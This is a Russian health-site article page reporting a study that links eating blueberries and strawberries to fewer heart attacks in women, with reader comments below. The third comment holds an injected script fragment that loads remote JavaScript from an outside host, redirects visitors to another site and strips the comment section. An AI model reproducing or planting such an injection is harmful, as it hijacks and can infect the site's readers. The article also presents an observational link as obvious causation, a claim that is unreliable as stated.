Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ягоды могут защитить вас ...  >>  Ягоды могут защитить вас от инфаркта
 
Обратная связь
 

Ягоды могут защитить вас от инфаркта

Размер шрифта
22 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Согласно данным недавно проведенного исследования, у женщин, которые ели чернику и клубнику не меньше трех раз в неделю, реже случался инфаркт миокарда.

ягоды защитят от инфаркта

По-видимому, в этих ягодах содержатся вещества, благотворно влияющие на состояние сердечно-сосудистой системы. В совместном американо-британском исследовании продолжительностью 18 лет участвовали 93 600 женщин в возрасте от 25 до 42 лет. Каждые четыре года они отвечали на вопросы о свое питании. За время проведения исследования зарегистрировано 405 инфарктов. Оказалось, что у женщин, в рационе которых  клубника и черника занимали заметное место, риск развития инфаркта был на 32% меньше в сравнении с теми, кто ел эти ягоды раз в месяц или меньше, отдавая предпочтения другим фруктам. В исследовании не учитывались такие факторы риска, как: артериальное давление, семейный анамнез, масса тела, вредные привычки.

Таким образом, очевидно, что в состав этих ягод входят некие химические соединения, которые весьма полезны для сердца.

Какие же?

Вещества эти называются флавоноиды. Они также содержатся в винограде, ежевике, черной смородине, баклажанах, краснокочанной капусте и других растительных продуктах. Исследователи утверждают, что особый подкласс флаваноидов – антоцианы – препятствует сужению артерий и появлению в них бляшек, а также в целом позитивно влияет на сердечно-сосудистую систему. И не только – антоцианы черники, помимо прочего, широко используются в офтальмологии при диабетической ретинопатии, возрастной макулярной дегенерации.

Поэтому не забывайте кушать чернику и клубнику! Снижение риска развития инфаркта миокарда на треть – весомый повод включить эти ягоды в свой еженедельный рацион.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Ладушка

25 апреля 2013 в 13:52

Цитировать   |   Пожаловаться

Ягоды - это замечательно! Я вот уважаю шиповник, боярышник, которые растут у нас в Сибири. Иногда запасаю на зиму эти ягоды, сушу и завариваю. Вот с такой профилактикой я думаю, что инфаркт мне не грозит.

2 - Татьяна 43

18 января 2015 в 11:55

Комментарий удален за нарушение Правил общения

3 - zzzzzz

30 июня 2015 в 23:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Черника снижает давление   Лучшая еда для беременной   Как есть настоящую еду   Что же есть весной, чтобы чувствовать себя хорошо весь год?  

Слайдшоу

1
8 суперлетних продуктов Ягода, которая снижает набор веса на 24%
Суперягоды на лето Самая опасная еда
10 суперпродуктов для женщин Диета против рака
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.